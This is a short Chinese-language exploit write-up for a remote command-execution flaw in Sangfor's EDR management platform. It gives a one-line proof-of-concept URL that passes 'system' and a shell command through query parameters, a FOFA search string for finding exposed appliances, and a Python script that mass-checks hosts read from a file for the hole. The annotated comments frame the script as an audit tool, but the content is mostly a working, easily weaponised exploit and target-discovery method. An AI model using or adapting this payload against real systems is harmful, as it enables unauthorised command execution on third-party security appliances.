深信服EDR-RCE

poc

https://test.com/tool/log/c.php?strip_slashes=system&host=id

复现

fofa

title="终端检测响应平台"

简陋验证脚本

#!/usr/bin/python3
import requests
#import sys

# Suppress urllib3 warnings (this includes the InsecureRequestWarning that
# would otherwise be emitted for each request sent with verify=False).
# NOTE(review): this only hides the warning; with verify=False the TLS
# certificate is still not validated, so responses are unauthenticated.
requests.packages.urllib3.disable_warnings()

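def edr_rce(url):
    """Check one host for the EDR ``/tool/log/c.php`` command-execution issue.

    Sends a single GET request whose query string sets
    ``strip_slashes=system`` and ``host=id``, then prints whether the
    response body contains the string ``root``.

    Args:
        url: Host (or ``host:port``) without a scheme; ``https://`` is
            prepended and surrounding whitespace is stripped.

    Raises:
        requests.RequestException: On connection failure or timeout. The
            caller decides whether to skip the host.
    """
    url3 = 'https://' + url.strip() + '/tool/log/c.php?strip_slashes=system&host=id'

    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
    }

    # verify=False skips certificate validation (presumably because the
    # appliance serves a self-signed certificate -- confirm), so the answer
    # is only as trustworthy as the network path to the host.
    # The explicit timeout keeps one unresponsive host from blocking the
    # whole run; requests waits indefinitely when no timeout is given.
    resp = requests.get(url=url3, headers=headers, verify=False, timeout=10)

    # NOTE(review): a bare substring match is a loose indicator. Any page that
    # merely contains "root" is reported as vulnerable, and a service running
    # under another account would be reported as not vulnerable. Treat a hit
    # as a lead to confirm on the appliance, not as proof.
    if 'root' in resp.text:
        print(url3 + ':' + '存在EDR_RCE漏洞')
    else:
        print(url3 + ':' + '不存在EDR_RCE漏洞')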

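if __name__ == '__main__':
    # injection.txt holds one host per line (no scheme); each host being
    # audited is checked in turn.
    # A single context-managed handle replaces the original's two open()
    # calls, one of which was never closed.
    with open("injection.txt") as targets:
        for line in targets:
            url = line.strip()
            if not url:
                # A blank line would only produce a malformed URL.
                continue
            try:
                edr_rce(url)
            except Exception as exc:
                # Best effort: keep going after a failed host, but report it so
                # an unreachable asset is not mistaken for a clean one.
                # Catching Exception instead of using a bare except lets
                # Ctrl-C still stop the run.
                print(url + ':' + '请求失败 ' + str(exc))
    print('运行结束')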